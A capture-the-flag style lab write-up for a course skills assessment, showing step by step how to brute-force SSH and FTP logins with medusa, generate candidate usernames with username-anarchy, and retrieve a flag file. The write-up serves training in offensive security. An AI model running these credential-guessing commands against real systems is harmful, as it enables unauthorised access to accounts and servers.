Skills Assessment Part 2
What is the username of the ftp user you find via brute-forcing?
For this Skills Assessment it is required that you completed successfully the Skills Assessment Part 1. We have to use the user founded previously and brute-force the credentials with the ssh module.
Step 1 - Brute-force the new target with the new user:
medusa -h <SERVER_IP> -n <SERVER_PORT> -u <USER> -P 2023-200_most_used_passwords.txt -M ssh -t 3
Step 2 - Login into the new target:
ssh <USER>@<SERVER_IP> -p <SERVER_PORT>
After login to the machine, lets make sure the ftp service is running with a simple
nmap localhost
command:

Step 3 - Explore the target machine:
It looks like the FTP server was already compromise. By checking the IncidentReport.txt we get some interesting information:
The user Thomas Smith was responsible for uploading files to the server. Our task is to find ftp user, and we can use the
username-anarchy
tool to generate usernames by combining the Thomas Smith name.
Step 4 - Find the user and password to the ftp server:
Move to the
username-anarchy
folder and generate usernames for Thomas Smith:./username-anarchy Thomas Smith > thomas_smith_usernames.txt
Brute-force the ftp authentication with medusa (we have a passwords.txt in the main directory):
medusa -h 127.0.0.1 -U username-anarchy/thomas_smith_usernames.txt -P passwords.txt -M ftp -t 5
User and password found!

What is the flag contained within flag.txt
Step 1 - Connect to the ftp server:
ftp 'ftp://<USER>:<PASSWORD>@localhost'
Step 3 - Retreive the flag:
Upon having logged in into the ftp service. You will easily find the flag with the
ls
command, then just download it with getflag.txt
.

And we are done! Very fun section with good and practical examples that show us how to use brute-force tools.
Last updated